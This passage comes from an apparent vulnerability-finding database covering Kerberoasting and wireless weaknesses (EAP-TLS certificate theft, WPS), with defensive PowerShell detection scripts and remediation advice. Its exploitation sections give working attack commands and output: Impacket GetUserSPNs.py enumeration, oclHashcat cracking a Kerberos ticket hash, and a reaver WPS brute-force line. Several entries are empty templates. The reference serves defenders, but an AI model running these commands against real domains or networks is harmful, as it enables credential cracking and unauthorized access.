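    # Resolve the privileged groups once so membership can be compared by DN.
    $privDns = foreach ($g in $PrivilegedGroups) {
        $grp = Get-ADGroup -Identity $g -ErrorAction SilentlyContinue
        if ($grp) { $grp.DistinguishedName }
    }

    foreach ($u in $users) {
        $ageDays = if ($u.PasswordLastSet) {
            (New-TimeSpan -Start $u.PasswordLastSet -End (Get-Date)).Days
        } else { $null }

        # Direct membership only; nested membership needs Get-ADGroupMember -Recursive.
        $privileged = @($u.MemberOf | Where-Object { $privDns -contains $_ })

        [pscustomobject]@{
            SamAccountName   = $u.SamAccountName
            Enabled          = $u.Enabled
            SPNs             = ($u.servicePrincipalName -join ';')
            PasswordAgeDays  = $ageDays
            PasswordStale    = ($null -eq $ageDays -or $ageDays -gt $MaxPasswordAgeDays)
            PrivilegedGroups = ($privileged -join ';')
            IsPrivileged     = ($privileged.Count -gt 0)
        }
    }
}

# Usage: worst offenders first, i.e. privileged accounts with stale passwords,
# which is exactly the uberuser / Domain Admins case in the Exploitation output.
Get-KerberoastableAccountReport |
    Sort-Object -Property IsPrivileged, PasswordStale -Descending |
    Format-Table SamAccountName, Enabled, IsPrivileged, PasswordAgeDays, SPNs -AutoSize
```

Any row with `IsPrivileged` true is the case to fix first (move the service to a Managed Service Account or a dedicated low-privilege account); rows with `PasswordStale` true are where a long, randomly generated password should be set.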

Example SPN Kerberos Tickets:

```
Id                   : uuid-7856e72a-2c40-4d94-a939-8c671b80e2bd-2
SecurityKeys         : {System.IdentityModel.Tokens.InMemorySymmetricSecurityKe
                       y}
ValidFrom            : 5/19/2016 3:06:41 PM
ValidTo              : 5/20/2016 12:53:24 AM
ServicePrincipalName : http/win10.sittingduck.info
SecurityKey          : System.IdentityModel.Tokens.InMemorySymmetricSecurityKey

Id                   : uuid-7856e72a-2c40-4d94-a939-8c671b80e2bd-3
SecurityKeys         : {System.IdentityModel.Tokens.InMemorySymmetricSecurityKe
                       y}
ValidFrom            : 5/19/2016 3:06:41 PM
ValidTo              : 5/20/2016 12:53:24 AM
ServicePrincipalName : MSSQLSvc/WIN2K8R2.sittingduck.info
SecurityKey          : System.IdentityModel.Tokens.InMemorySymmetricSecurityKey
```

## Capabilities and Risk

An attacker can use the SPN services to request tickets for all of the SPNs listed in the domain and attempt to crack the passwords for all of the users the services are running under. If the SPN services are running under a user context, and the attacker is able to brute-force the password for that user, the attacker can then utilize that password in any way that user has permissions for.

- Acquire a list of services running on a particular host
- Acquire Kerberos tickets in the context of the user running the service
- Compromise a domain, depending on the level of the user running the SPN service (Domain Admin accounts have been used to run services in the past)

## Detection

Because this is standard usage of Active Directory, it blends into normal daily traffic. Windows Advanced Threat Analytics (ATA) has a module that includes detection of large numbers of SPN Kerberos ticket requests. The other useful detection mechanism is to detect any time a service account is used outside of the machine to which it is assigned.

## Remediation

- Use Managed Service Accounts if possible.
They are automatically restricted to a single machine (this will not work for cluster services), and they change their password on a regular basis, much like computer accounts.
- Ensure that any service accounts have long, strong passwords (20+ characters)

## References

- [Service Principal Names](https://msdn.microsoft.com/en-us/library/ms677949(v=vs.85%29.aspx)
- [Managed Service Accounts](https://technet.microsoft.com/en-us/library/dd560633(v=ws.10%29.aspx)
- [Cracking Kerberos TGS Tickets Using Kerberoast - Exploiting Kerberos to Compromise the Active Directory Domain - Sean Metcalf - ADSecurity.org](https://adsecurity.org/?p=2293)

## Exploitation

Acquire a list of SPNs and request them using Impacket's GetUserSPNs.py example script:
```
root@wpad:~/impacket/examples# ./GetUserSPNs.py -dc-ip 192.168.168.10 sittingduck.info/notanadmin
Impacket v0.9.15-dev - Copyright 2002-2016 Core Security Technologies

Password:
ServicePrincipalName                Name        MemberOf                                          PasswordLastSet
----------------------------------  ----------  ------------------------------------------------  -------------------
http/win10.sittingduck.info         uberuser    CN=Domain Admins,CN=Users,DC=sittingduck,DC=info  2015-11-10 23:47:21
MSSQLSvc/WIN2K8R2.sittingduck.info  sqladmin01
```

Crack the service ticket password using oclHashcat:
```
root@sf:~/oclHashcat# ./oclHashcat -m 13100 hash -w 3 -a 3 ?l?l?l?l?l?l?l
oclHashcat v2.01 (g0891e39) starting...

Device #1: Hawaii, 2858/4025 MB allocatable, 1010Mhz, 44MCU
Device #2: AMD FX(tm)-8120 Eight-Core Processor, skipped

Hashes: 1 hashes; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Applicable Optimizers:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt
* Brute-Force
Watchdog: Temperature abort trigger set to 90c
Watchdog: Temperature retain trigger set to 80c

Device #1: Kernel /root/git/oclHashcat/kernels/m13100_a3.919aa8b9.kernel (234320 bytes)
Device #1: Kernel /root/git/oclHashcat/kernels/markov_le.919aa8b9.kernel (36184 bytes)

Device #1: autotuned kernel-accel to 64
Device #1: autotuned kernel-loops to 50

[s]tatus [p]ause [r]esume [b]ypass [c]heckpoint [q]uit =>

$krb5tgs$23$*user$realm$test/hashcat*$08e2261b7a89e56f530b2f7e0620fe8b$ecdca97c13814c95810d7706faf986dad98d06ba033fc5a45fbe9b417b855db5:hashcat

Session.Name...: oclHashcat
Status.........: Cracked
Input.Mode.....: Mask (?l?l?l?l?l?l?l) [7]
Hash.Target....: $krb5tgs$23$*user$realm$test/hashcat*$08e...
Hash.Type......: Kerberos 5 TGS-REP etype 23
Time.Started...: Wed Feb 17 08:33:57 2016 (5 secs)
Speed.Dev.#1...: 111.0 MH/s (80.83ms)
Recovered......: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
Progress.......: 252313600/8031810176 (3.14%)
Rejected.......: 0/252313600 (0.00%)
Restore.Point..: 0/456976 (0.00%)
HWMon.GPU.#1...: 0% Util, 42c Temp, 20% Fan

Started: Wed Feb 17 08:33:57 2016
Stopped: Wed Feb 17 08:34:04 2016
```

--------------------------------------------------------------------------------
/Wireless/EAP-TLS.md:
--------------------------------------------------------------------------------
/*
Title: WPA EAP-TLS Mode Certificate Only
Description: Finding when EAP-TLS is in a mode that only requires a client certificate be present.
*/

- LAST UPDATED DATE: 2015/11/25
- LAST UPDATED BY: @mubix

## Summary

EAP-TLS based authentication is the best form of wireless security currently available because of the need for a client certificate to authenticate to the wireless network. However, without additional authentication it is difficult to detect misuse or theft of the client certificate.

## Capabilities and Risk

- Theft / creation of a valid certificate used for continued access to the wireless network

## Detection

1. Use of client certificates on multiple IP addresses
2. Reissuance of certificates with the export flag enabled

## Remediation

1. Revoke the affected certificate and start an investigation into the affected user(s). Unless it was re-issued so as to be exportable, administrative access to the machine it was installed on is needed in order to extract the certificate.
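The first detection item, one client certificate seen from more than one IP address, worked as an added example that is not part of cfdb. It takes a flat list of authentication records (certificate thumbprint, subject, client IP, timestamp) of the kind an NPS/RADIUS accounting export yields, and flags a certificate whose consecutive sightings change address within a window. The field names, the sample records, thumbprints and addresses are all constructed for the example, as is the 24-hour default window.

```powershell
# Added example (not part of cfdb): flag a client certificate that authenticates
# from more than one IP address within a window. The record layout below is an
# assumption; map your NPS/RADIUS accounting export onto these four fields.

function Find-SharedClientCertificates {
    [CmdletBinding()]
    param(
        [Parameter(Mandatory)][object[]]$Records,
        # Two distinct addresses closer together than this are treated as suspicious
        [int]$WindowHours = 24
    )

    $Records |
        Group-Object -Property Thumbprint |
        ForEach-Object {
            $sorted = @($_.Group | Sort-Object Timestamp)
            $addrs  = @($sorted.ClientIP | Sort-Object -Unique)
            if ($addrs.Count -lt 2) { return }

            # Compare consecutive sightings: a device roaming between APs keeps
            # its DHCP lease, so an address change inside a short window is the
            # interesting case rather than a lease renewal weeks apart.
            $hit = $false
            for ($i = 1; $i -lt $sorted.Count; $i++) {
                $gap = New-TimeSpan -Start $sorted[$i - 1].Timestamp -End $sorted[$i].Timestamp
                if ($sorted[$i - 1].ClientIP -ne $sorted[$i].ClientIP -and $gap.TotalHours -le $WindowHours) {
                    $hit = $true
                    break
                }
            }

            if ($hit) {
                [pscustomobject]@{
                    Thumbprint = $_.Name
                    Subject    = $sorted[0].Subject
                    Addresses  = ($addrs -join ', ')
                    FirstSeen  = $sorted[0].Timestamp
                    LastSeen   = $sorted[-1].Timestamp
                }
            }
        }
}

# Constructed sample: one certificate seen from two addresses fifteen minutes
# apart, and one certificate that behaves normally. Thumbprints and addresses
# are placeholders, not real values.
$sample = @(
    [pscustomobject]@{ Timestamp = [datetime]'2015-11-25T08:00:00'; Subject = 'CN=alice'; Thumbprint = 'AAAA1111'; ClientIP = '10.1.1.20' }
    [pscustomobject]@{ Timestamp = [datetime]'2015-11-25T08:40:00'; Subject = 'CN=alice'; Thumbprint = 'AAAA1111'; ClientIP = '10.1.1.20' }
    [pscustomobject]@{ Timestamp = [datetime]'2015-11-25T08:55:00'; Subject = 'CN=alice'; Thumbprint = 'AAAA1111'; ClientIP = '10.1.7.99' }
    [pscustomobject]@{ Timestamp = [datetime]'2015-11-25T09:10:00'; Subject = 'CN=bob';   Thumbprint = 'BBBB2222'; ClientIP = '10.1.1.31' }
)

Find-SharedClientCertificates -Records $sample | Format-Table -AutoSize
```

A hit is the trigger for the Remediation step in this entry: revoke that certificate and investigate the user. Pair this with a check on the issuing CA for certificates re-issued with the exportable flag (the second detection item), since that is the path that does not require administrative access to the original machine.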

## References

- Setting up EAP-TLS with Cisco WLC: https://networklessons.com/wireless/peap-and-eap-tls-on-server-2008-and-cisco-wlc/
- Stealing user certificates with Mimikatz:
  - http://carnal0wnage.attackresearch.com/2012/10/more-with-mimikatz-crypto-module.html
  - http://www.darkoperator.com/blog/2013/6/11/stealing-user-certificates-with-meterpreter-mimikatz-extensi.html
- KeyRaider malware steals certificates from iPhone: http://researchcenter.paloaltonetworks.com/2015/08/keyraider-ios-malware-steals-over-225000-apple-accounts-to-create-free-app-utopia/


## Exploitation

### Scenario 1 - Exporting Certificate via Mimikatz

```
Test
```

--------------------------------------------------------------------------------
/Wireless/WEP.md:
--------------------------------------------------------------------------------
/*
Title: WEP Encryption Used
Description: Search engine meta data about the finding
*/

- LAST UPDATED DATE:
- LAST UPDATED BY:

## Summary

A brief summary of the vulnerability

## Capabilities and Risk

This is to replace any "level" or "score" because of how much context is needed
for a vulnerability to have one, which is beyond the scope of this database.

- List of possible uses for this vulnerability to give real-world uses
- Read files as www-data (or whatever user the web server is running as)
- DDoS service
- Code execution (for this one to fly there needs to be a reference proving it)

## Detection

How does one detect the exploitation of this vulnerability, or detect its presence?

## Remediation

What are some of the ways to fix this vulnerability?

## References

- Link to blog post
- Link to CVE
- Link to Metasploit module
- Link to Nessus/NeXpose/Qualys write-up

## Exploitation

A write-up on how this vulnerability can be exploited with demo code or screenshots


--------------------------------------------------------------------------------
/Wireless/WPA-PSK.md:
--------------------------------------------------------------------------------
/*
Title: WPA Pre-Shared Key
Description: Search engine meta data about the finding
*/

- LAST UPDATED DATE:
- LAST UPDATED BY:

## Summary

A brief summary of the vulnerability

## Capabilities and Risk

This is to replace any "level" or "score" because of how much context is needed
for a vulnerability to have one, which is beyond the scope of this database.

- List of possible uses for this vulnerability to give real-world uses
- Read files as www-data (or whatever user the web server is running as)
- DDoS service
- Code execution (for this one to fly there needs to be a reference proving it)

## Detection

How does one detect the exploitation of this vulnerability, or detect its presence?

## Remediation

What are some of the ways to fix this vulnerability?

## References

- Link to blog post
- Link to CVE
- Link to Metasploit module
- Link to Nessus/NeXpose/Qualys write-up

## Exploitation

A write-up on how this vulnerability can be exploited with demo code or screenshots


--------------------------------------------------------------------------------
/Wireless/WPS.md:
--------------------------------------------------------------------------------
/*
Title: Wifi Protected Setup (WPS)
Description: PIN-based WPS is susceptible to brute-force attacks that could allow unauthorized access to WiFi networks.
Devices relying on physical methods are vulnerable to physical attacks that allow network access.
*/

- LAST UPDATED DATE: 12/14/2015
- LAST UPDATED BY: Joey M. (@l0stkn0wledge)

## Summary

WPS is a feature most often found on home wireless routers; however, due to a large overlap in the home, small office, and small business markets, the feature has crept into some smaller corporate environments where wireless networks are set up using more commodity hardware.

WPS can pose a variety of risks for wireless network security. The PIN-based method can be vulnerable to brute-force attacks over the air. Other types (e.g. push-button methods) would require physical access to the router.

## Capabilities and Risk

This would allow an attacker to gain unauthorized access to a wireless network, thereby allowing for additional access into the network and systems attached to that connection.

## Detection

WPS settings can be confirmed by examining the configuration of your wireless router. Button-based WPS methods will have a button located on the router.

## Remediation

Disable WPS on wireless access points. If a device cannot disable WPS, default PIN values should be changed. Physical access to the router should be limited and secured to prevent local, physical attacks using WPS.

## References

- WPS Wikipedia (https://en.wikipedia.org/wiki/Wi-Fi_Protected_Setup)
- Reaver on Google Code (https://code.google.com/p/reaver-wps/)
- CERT write-up on the WPS PIN vulnerability (http://www.kb.cert.org/vuls/id/723755)

## Exploitation

```
reaver -i [monitor interface number] -b [ESSID] -v
```
--------------------------------------------------------------------------------